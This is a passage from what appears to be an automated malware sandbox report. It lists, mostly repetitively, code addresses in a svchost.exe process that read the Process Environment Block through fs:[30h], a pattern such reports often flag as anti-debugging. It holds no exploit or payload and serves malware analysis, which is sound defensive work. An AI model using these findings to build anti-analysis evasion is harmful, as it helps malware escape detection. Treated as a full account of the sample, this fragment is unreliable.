Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104164 mov eax, dword ptr fs:[00000030h]	2_2_03104164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03070185 mov eax, dword ptr fs:[00000030h]	2_2_03070185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EC188 mov eax, dword ptr fs:[00000030h]	2_2_030EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4180 mov eax, dword ptr fs:[00000030h]	2_2_030D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B019F mov eax, dword ptr fs:[00000030h]	2_2_030B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A197 mov eax, dword ptr fs:[00000030h]	2_2_0302A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F61C3 mov eax, dword ptr fs:[00000030h]	2_2_030F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_030AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_031061E5 mov eax, dword ptr fs:[00000030h]	2_2_031061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030601F8 mov eax, dword ptr fs:[00000030h]	2_2_030601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4000 mov ecx, dword ptr fs:[00000030h]	2_2_030B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D2000 mov eax, dword ptr fs:[00000030h]	2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E016 mov eax, dword ptr fs:[00000030h]	2_2_0304E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A020 mov eax, dword ptr fs:[00000030h]	2_2_0302A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C020 mov eax, dword ptr fs:[00000030h]	2_2_0302C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6030 mov eax, dword ptr fs:[00000030h]	2_2_030C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032050 mov eax, dword ptr fs:[00000030h]	2_2_03032050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6050 mov eax, dword ptr fs:[00000030h]	2_2_030B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305C073 mov eax, dword ptr fs:[00000030h]	2_2_0305C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303208A mov eax, dword ptr fs:[00000030h]	2_2_0303208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C80A8 mov eax, dword ptr fs:[00000030h]	2_2_030C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov eax, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_030F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B20DE mov eax, dword ptr fs:[00000030h]	2_2_030B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0302A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030380E9 mov eax, dword ptr fs:[00000030h]	2_2_030380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B60E0 mov eax, dword ptr fs:[00000030h]	2_2_030B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0302C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030720F0 mov ecx, dword ptr fs:[00000030h]	2_2_030720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C700 mov eax, dword ptr fs:[00000030h]	2_2_0306C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030710 mov eax, dword ptr fs:[00000030h]	2_2_03030710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060710 mov eax, dword ptr fs:[00000030h]	2_2_03060710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C720 mov eax, dword ptr fs:[00000030h]	2_2_0306C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov ecx, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306273C mov eax, dword ptr fs:[00000030h]	2_2_0306273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AC730 mov eax, dword ptr fs:[00000030h]	2_2_030AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov esi, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306674D mov eax, dword ptr fs:[00000030h]	2_2_0306674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030750 mov eax, dword ptr fs:[00000030h]	2_2_03030750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE75D mov eax, dword ptr fs:[00000030h]	2_2_030BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072750 mov eax, dword ptr fs:[00000030h]	2_2_03072750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4755 mov eax, dword ptr fs:[00000030h]	2_2_030B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038770 mov eax, dword ptr fs:[00000030h]	2_2_03038770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040770 mov eax, dword ptr fs:[00000030h]	2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D678E mov eax, dword ptr fs:[00000030h]	2_2_030D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030307AF mov eax, dword ptr fs:[00000030h]	2_2_030307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E47A0 mov eax, dword ptr fs:[00000030h]	2_2_030E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B07C3 mov eax, dword ptr fs:[00000030h]	2_2_030B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030527ED mov eax, dword ptr fs:[00000030h]	2_2_030527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_030BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030347FB mov eax, dword ptr fs:[00000030h]	2_2_030347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE609 mov eax, dword ptr fs:[00000030h]	2_2_030AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304260B mov eax, dword ptr fs:[00000030h]	2_2_0304260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03072619 mov eax, dword ptr fs:[00000030h]	2_2_03072619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304E627 mov eax, dword ptr fs:[00000030h]	2_2_0304E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03066620 mov eax, dword ptr fs:[00000030h]	2_2_03066620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068620 mov eax, dword ptr fs:[00000030h]	2_2_03068620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303262C mov eax, dword ptr fs:[00000030h]	2_2_0303262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0304C640 mov eax, dword ptr fs:[00000030h]	2_2_0304C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F866E mov eax, dword ptr fs:[00000030h]	2_2_030F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A660 mov eax, dword ptr fs:[00000030h]	2_2_0306A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03062674 mov eax, dword ptr fs:[00000030h]	2_2_03062674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034690 mov eax, dword ptr fs:[00000030h]	2_2_03034690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0306C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030666B0 mov eax, dword ptr fs:[00000030h]	2_2_030666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0306A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_030AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B06F1 mov eax, dword ptr fs:[00000030h]	2_2_030B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6500 mov eax, dword ptr fs:[00000030h]	2_2_030C6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104500 mov eax, dword ptr fs:[00000030h]	2_2_03104500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040535 mov eax, dword ptr fs:[00000030h]	2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E53E mov eax, dword ptr fs:[00000030h]	2_2_0305E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038550 mov eax, dword ptr fs:[00000030h]	2_2_03038550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306656A mov eax, dword ptr fs:[00000030h]	2_2_0306656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov eax, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032582 mov ecx, dword ptr fs:[00000030h]	2_2_03032582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064588 mov eax, dword ptr fs:[00000030h]	2_2_03064588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E59C mov eax, dword ptr fs:[00000030h]	2_2_0306E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B05A7 mov eax, dword ptr fs:[00000030h]	2_2_030B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030545B1 mov eax, dword ptr fs:[00000030h]	2_2_030545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E5CF mov eax, dword ptr fs:[00000030h]	2_2_0306E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030365D0 mov eax, dword ptr fs:[00000030h]	2_2_030365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0306A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0305E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030325E0 mov eax, dword ptr fs:[00000030h]	2_2_030325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C5ED mov eax, dword ptr fs:[00000030h]	2_2_0306C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068402 mov eax, dword ptr fs:[00000030h]	2_2_03068402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302E420 mov eax, dword ptr fs:[00000030h]	2_2_0302E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302C427 mov eax, dword ptr fs:[00000030h]	2_2_0302C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B6420 mov eax, dword ptr fs:[00000030h]	2_2_030B6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A430 mov eax, dword ptr fs:[00000030h]	2_2_0306A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306E443 mov eax, dword ptr fs:[00000030h]	2_2_0306E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA456 mov eax, dword ptr fs:[00000030h]	2_2_030EA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0302645D mov eax, dword ptr fs:[00000030h]	2_2_0302645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305245A mov eax, dword ptr fs:[00000030h]	2_2_0305245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC460 mov ecx, dword ptr fs:[00000030h]	2_2_030BC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305A470 mov eax, dword ptr fs:[00000030h]	2_2_0305A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030EA49A mov eax, dword ptr fs:[00000030h]	2_2_030EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030364AB mov eax, dword ptr fs:[00000030h]	2_2_030364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030644B0 mov ecx, dword ptr fs:[00000030h]	2_2_030644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_030BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030304E5 mov ecx, dword ptr fs:[00000030h]	2_2_030304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104B00 mov eax, dword ptr fs:[00000030h]	2_2_03104B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AEB1D mov eax, dword ptr fs:[00000030h]	2_2_030AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EB20 mov eax, dword ptr fs:[00000030h]	2_2_0305EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030F8B28 mov eax, dword ptr fs:[00000030h]	2_2_030F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E4B4B mov eax, dword ptr fs:[00000030h]	2_2_030E4B4B
